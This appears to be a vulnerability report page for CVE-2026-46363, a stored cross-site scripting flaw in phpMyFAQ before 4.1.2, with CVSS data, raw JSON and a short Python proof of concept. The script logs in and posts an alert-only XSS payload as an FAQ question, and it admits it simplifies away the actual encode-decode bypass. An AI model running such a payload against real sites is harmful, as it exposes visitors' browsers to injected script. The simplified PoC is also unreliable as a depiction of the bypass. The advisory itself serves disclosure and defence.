Security Vulnerability Report
中文
CVE-2026-46363 CVSS 5.4 MEDIUM

CVE-2026-46363

Published: 2026-05-15 19:17:04
Last Modified: 2026-05-15 21:16:39
Source: [email protected]

Description

phpMyFAQ before 4.1.2 contains a stored cross-site scripting vulnerability in FAQ creation and update endpoints that bypass sanitization through encode-decode cycles. The vulnerability allows authenticated attackers with FAQ_ADD permission to inject malicious script tags via question or answer parameters, which execute in every visitor's browser when FAQ content is rendered with the raw Twig filter.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

phpMyFAQ < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-46363 # This script demonstrates the injection of a payload into phpMyFAQ. # Requires authentication with FAQ_ADD permissions. import requests def exploit(target, username, password): session = requests.Session() # 1. Authenticate login_url = f"{target}/index.php?action=login" creds = {"username": username, "password": password} session.post(login_url, data=creds) # 2. Inject Payload (Simplified representation of encode-decode bypass) # The payload might need specific encoding to bypass the initial filter. # The 'raw' Twig filter ensures execution upon rendering. xss_payload = '<img src=x onerror=alert(1)>' add_faq_url = f"{target}/index.php?action=save" data = { "question": xss_payload, "answer": "This answer contains stored XSS.", "submit": "Save" } res = session.post(add_faq_url, data=data) if res.status_code == 200: print("[+] Payload injected successfully!") print(f"[+] Check the FAQ page at {target}/index.php?action=faq") else: print("[-] Injection failed.") # Usage # exploit("http://localhost/phpmyfaq", "admin", "password")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46363", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:03.633", "lastModified": "2026-05-15T21:16:38.863", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ before 4.1.2 contains a stored cross-site scripting vulnerability in FAQ creation and update endpoints that bypass sanitization through encode-decode cycles. The vulnerability allows authenticated attackers with FAQ_ADD permission to inject malicious script tags via question or answer parameters, which execute in every visitor's browser when FAQ content is rendered with the raw Twig filter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-f5p7-2c9q-8896", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phpmyfaq-stored-xss-in-faq-question-answer-via-encode-decode-bypass", "source": "[email protected]"}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-f5p7-2c9q-8896", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.